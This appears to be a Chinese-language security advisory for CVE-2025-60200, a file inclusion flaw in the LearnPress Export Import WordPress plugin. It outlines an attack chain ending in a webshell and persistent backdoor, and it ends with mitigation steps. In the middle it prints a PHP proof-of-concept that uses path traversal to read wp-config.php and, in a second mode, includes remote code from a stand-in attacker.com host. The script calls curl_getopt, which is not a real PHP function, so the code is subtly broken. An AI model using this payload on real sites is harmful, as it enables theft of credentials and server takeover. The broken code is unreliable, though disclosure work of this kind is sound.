CVE-2025-60200 LearnPress Export Import插件本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-60200

漏洞类型

本地文件包含/远程文件包含

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

LearnPress Export Import (WordPress插件)

漏洞概述

CVE-2025-60200是WordPress插件LearnPress Export Import中发现的一个高危安全漏洞，CVSS评分达到7.5分。该漏洞属于PHP远程文件包含（Remote File Inclusion）类型，具体表现为对文件名缺乏适当控制，允许攻击者通过构造恶意请求包含任意本地或远程文件。此漏洞存在于LearnPress Export Import插件的导入功能中，攻击者可以利用该漏洞读取服务器上的敏感文件，如配置文件(/etc/passwd、wp-config.php等)，甚至在特定条件下实现远程代码执行(RCE)。该漏洞影响范围涵盖插件4.1.2及之前所有版本，已于2025年11月6日被披露。由于无需认证即可利用此漏洞，且对机密性、完整性和可用性均造成高影响，建议使用该插件的用户立即采取修复措施。

技术细节

该漏洞存在于LearnPress Export Import插件的文件包含逻辑中，具体位置在处理导入文件路径的参数时未进行充分的输入验证和路径规范化处理。攻击者可以通过构造包含路径遍历序列(如../../)或远程URL的参数值，诱使PHP代码包含任意文件。在PHP文件包含函数(require、include、require_once、include_once)被滥用时，如果allow_url_fopen和allow_url_include配置启用，攻击者甚至可以包含远程服务器上的恶意PHP文件，从而执行任意代码。漏洞利用的关键在于插件未对用户可控的filename参数进行安全过滤，未检查路径中的../序列，也未限制文件类型。典型的攻击场景中，攻击者会利用插件的导入功能点，提交包含恶意路径的请求，例如通过wp-admin/admin-ajax.php或特定的导入端点，指定filename参数指向敏感文件或远程恶意脚本。成功利用此漏洞可导致敏感信息泄露、服务器被完全接管等严重后果。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标网站使用的WordPress版本及LearnPress Export Import插件版本

STEP 2

步骤2

漏洞探测：访问WordPress管理后台或前端导入功能点，定位可利用的文件包含端点

STEP 3

步骤3

构造恶意请求：构造包含路径遍历序列(../../)或远程URL的filename参数

STEP 4

步骤4

敏感文件读取：发送恶意请求，目标服务器包含并执行被指定文件的PHP代码，导致敏感信息泄露

STEP 5

步骤5

权限提升：如果allow_url_include启用，攻击者可包含远程恶意PHP文件实现远程代码执行

STEP 6

步骤6

持久化控制：在服务器上部署Webshell，建立持久化后门，完全控制目标系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-60200 PoC - LearnPress Export Import LFI/RFI
 * Usage: php poc.php <target_url> [payload_type]
 * payload_type: local (default) or remote
 */

$target = $argv[1] ?? '';
$payload_type = $argv[2] ?? 'local';

if (empty($target)) {
    echo "Usage: php poc.php <target_url> [local|remote]\n";
    echo "Example: php poc.php http://target.com/wp-admin/admin-ajax.php local\n";
    exit(1);
}

// Local File Inclusion payload - Read wp-config.php
$local_payload = array(
    'action' => 'learnpress_import_file',
    'file' => '../../../../wp-config.php',
);

// Remote File Inclusion payload (if allow_url_include is enabled)
$remote_payload = array(
    'action' => 'learnpress_import_file',
    'file' => 'http://attacker.com/malicious.txt',
);

$payload = ($payload_type === 'remote') ? $remote_payload : $local_payload;

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

$response = curl_exec($ch);
$http_code = curl_getopt($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[*] Sending payload: " . ($payload_type === 'remote' ? 'Remote' : 'Local') . " File Inclusion\n";
echo "[*] Target: $target\n";
echo "[*] HTTP Code: $http_code\n";
echo "[+] Response:\n";
echo $response;
?>

影响范围

LearnPress Export Import <= 4.1.2

LearnPress Export Import <= 4.0.9 (已知存在LFI变种)

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 临时禁用LearnPress Export Import插件，直至完成安全更新；2) 通过Web应用防火墙规则拦截包含../或http://等字符的请求参数；3) 修改PHP配置文件(php.ini)，设置allow_url_include=Off和allow_url_fopen=Off；4) 限制插件目录的访问权限，确保攻击者无法直接访问插件文件；5) 启用WordPress安全插件(如Wordfence)提供实时防护；6) 监控服务器访问日志，关注异常的文件包含请求模式。